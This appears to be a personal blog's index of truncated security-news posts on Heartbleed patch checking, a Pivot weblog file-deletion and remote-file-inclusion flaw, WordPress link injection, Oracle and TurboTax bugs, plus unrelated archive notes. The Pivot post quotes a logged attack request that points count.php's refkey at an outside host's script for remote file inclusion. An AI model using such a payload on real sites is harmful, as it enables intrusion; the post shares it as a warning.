Ubuntu Linux and the Heartbleed OpenSSL vulnerability.

If you're in the mad scramble to patch the Heartbleed vulnerability in OpenSSL on your Ubuntu servers but you need to see some documentation, look in your /usr/share/doc/openssl/changelog.Debian.gz file. If you see the following at the very top of the file, you're patched:


openssl (1.0.1-4ubuntu5.12) precise-security; urgency=medium

* SECURITY UPDATE: side-channel attack on Montgomery ladder implementation
- debian/patches/CVE-2014-0076.patch: add and use constant time swap in
crypto/bn/bn.h, crypto/bn/bn_lib.c, crypto/ec/ec2_mult.c,
util/libeay.num.
- CVE-2014-0076
* SECURITY UPDATE: memory disclosure in TLS heartbeat extension …

Read more...

Remotely exploitable vulnerability found in Pivot v1.40.6!

Attention all users of the Pivot weblog package! A remotely exploitable vulnerability was discovered in the /web/content/extensions/bbclone_tools/count.php file. This vulnerability can be used by an attacker to delete files from your web content directory, and if the register_globals PHP variable is set, it can be used to stage a remote file inclusion attack. One person (I'll blank their IP address) has already tried it on my website:

a.b.c.d - - [19/Mar/2009:17:19:22 -0400] "GET //extensions/bbclone_tools/count.php?refkey=http://www.infernodancevault.com//modules/tinycontent/admin/chmod.txt?? HTTP/1 …

Read more...

Wordpress security vulnerability and mitigating strategies.

For the past couple of weeks the information security community has been noticing someone exploiting a new vulnerability in the Wordpress blogging software that lets the attacker inject arbitrary HTML code into the content from outside. So far, what has been seen is an

..
HTML entity containing multiple hyperlinks to other sites, presumably for the purpose of artificially bumping up someone's search engine rankings. Both the height and width of the injected HTML code are usually set to zero pixels each, but I've seen a couple of instances of one-by-one
..
entities as well. It stands to reason that pretty much …

Read more...

Oracle sure took its sweet old time patching this...

Oracle is best known for its database system, which many thousands of companies make use of in some capacity or another. It's big, it's bad, it's complex, but it's also got some amazing features, like clustering and replication that many other databases (open source and otherwise) can't hold a candle to, assuming that you understand it well enough to make it work. It's a complex beast, no two ways about it. That complexity, however, is no excuse for them taking two years to patch a security vulnerability in Oracle 10. It's a cross-site scripting bug in the enterprise search subsystem …

Read more...

Turbotax web application security vulnerability.

A customer of the Turbo Tax web application discovered by accident that it is possible to look at tax information belonging to other customers who happen to share your last name by attempting to view past tax filings. By 'tax information' I mean everything, from Social Security Numbers to bank account numbers and routing codes.

Here's hoping they audited the code in that web app and fixed it before anyone else had a chance to discover the bug, and take advantage of it.

Archive: 20070108

Note to self: All the walking in DC is making me go through tennis socks faster than I can replace them. I've blown through six socks in three days because they've ripped through without warning walk walking down the street. This is a little annoying because I feel like a slob. It's 2007, so the time for upgrading is probably upon most of us. To wit, here's something that should leave just about everyone drooling in anticipation: This Thursday upcoming, Hitachi will put their one terabyte hard drives on the consumer market with an opening price of $399us. The drives …

Read more...

Archive: 20070109

Here's an article just in from the "In other news, fire is hot and water is wet" department: A study shows that studies funded by companies tend to frame the products of those companies in a better light. A three step study of 111 dietetic studies of soda milk, and water was performed in such a way that the groups of researchers were ignorant of the conclusions of the others (the protocol is outlined in the article, it's pretty neat) to determine if the findings of the studies would be helpful or harmful to the bottom line of the organisation …

Read more...